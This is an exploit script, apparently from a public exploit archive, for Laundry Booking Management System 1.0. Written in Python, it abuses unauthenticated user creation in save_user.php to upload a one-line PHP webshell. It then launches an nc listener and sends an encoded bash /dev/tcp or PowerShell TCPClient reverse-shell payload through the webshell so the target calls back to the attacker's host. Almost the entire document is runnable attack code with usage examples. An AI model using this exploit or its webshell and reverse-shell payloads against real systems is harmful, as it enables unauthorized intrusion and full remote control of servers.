Laundry Booking Management System 1.0 - Remote Code Execution Exploit

# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10

# Vulnerability: Its possible create an user without being authenticated,
# in this request you can upload a simple webshell which will used to get a
# reverse shell

import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print("      Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:

    def __init__(self,target, shell_name,localhost,localport,os):

        self.target=target
        self.shell_name=shell_name
        self.localhost=localhost
        self.localport=localport
        self.LHL= '/'.join([localhost,localport])
        self.HPW= "'"+localhost+"'"+','+localport
        self.os=os
        self.session = requests.Session()
        #self.http_proxy  = "http://127.0.0.1:8080"
        #self.https_proxy = "https://127.0.0.1:8080"
        #self.proxies = {"http"  : self.http_proxy,
        #           "https" : self.https_proxy}

        self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}

    def create_user(self):

        url = self.target+"/pages/save_user.php"
        data = {
                "fname":"bypass",
                "email":"[email protected]",
                "password":"password",
                "group_id": "2",

            }

         #Creates user "bypass" and upload a simple webshell without
authentication
        request = self.session.post(url,
data=data,headers=self.headers,files={"image":(self.shell_name
+'.php',"<?=`$_GET[cmd]`?>")})
        time.sleep(3)
        if (request.status_code == 200):
            print('[*] The user and webshell were created\n')
        else:
            print('Something was wront...!')

    def execute_shell(self):
        if self.os == "linux":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)

            #Use a payload in bash to get a reverse shell
            payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
            execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload

            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        elif self.os == "windows":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)

            #Use a payload in powershell to get a reverse shell
            payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
            execute_command =
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload


            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        else:
            print('Windows or linux')


def get_args():
    parser = argparse.ArgumentParser(description='Laundry Booking
Management System')
    parser.add_argument('-t', '--target', dest="target", required=True,
action='store', help='Target url')
    parser.add_argument('-s', '--shell_name', dest="shell_name",
required=True, action='store', help='shell_name')
    parser.add_argument('-l', '--localhost', dest="localhost",
required=True, action='store', help='local host')
    parser.add_argument('-p', '--localport', dest="localport",
required=True, action='store', help='local port')
    parser.add_argument('-os', '--os', choices=['linux', 'windows'],
dest="os", required=True, action='store', help='linux,windows')
    args = parser.parse_args()
    return args

args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport


xp = Exploit(target, shell_name,localhost,localport,args.os)
xp.create_user()
xp.execute_shell()

#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux